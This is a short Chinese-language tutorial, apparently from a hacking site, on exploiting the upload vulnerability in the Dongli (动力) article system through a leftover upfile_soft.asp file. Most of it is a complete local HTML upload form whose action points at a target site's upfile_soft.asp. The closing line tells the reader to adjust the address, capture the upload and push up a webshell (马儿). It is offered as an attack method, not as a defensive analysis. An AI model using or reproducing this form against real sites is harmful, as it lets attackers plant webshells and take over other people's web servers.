动力文章上传漏洞的本地利用
最近盛行动力文章上传漏洞,不少网站纷纷关闭了上传功能,但一些网站并没有删除上传文件:upfile_soft.asp
这就给本地利用创造了机会,我们可以在本地构造一个上传页面,将上传地址直接指向网站的upfile_soft.asp文件。
构造的本地upfile.htm源程序如下:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css">
<!--
BODY{
BACKGROUND-COLOR: #E1F4EE;
font-size:9pt
}
.tx1 { height: 20px;font-size: 9pt; border: 1px solid; border-color: #000000; color: #0000FF}
-->
</style>
</head>
<body leftmargin="0" topmargin="0">
<form action=" http://www.xxx.com/upfile_soft.asp " method="post" name="form1" enctype="multipart/form-data">
<input name="FileName" type="FILE" class="tx1" size="40">
<input type="submit" name="Submit" value="上传" style="border:1px double rgb(88,88,88);font:9pt">
</form>
</body>
</html>
修改代码中相应的页面地址我们就可以重新进行上传抓包,继而上传我们的马儿! |
设为首页
加入收藏
总编信箱
投稿或申请专栏请先 [登 陆]
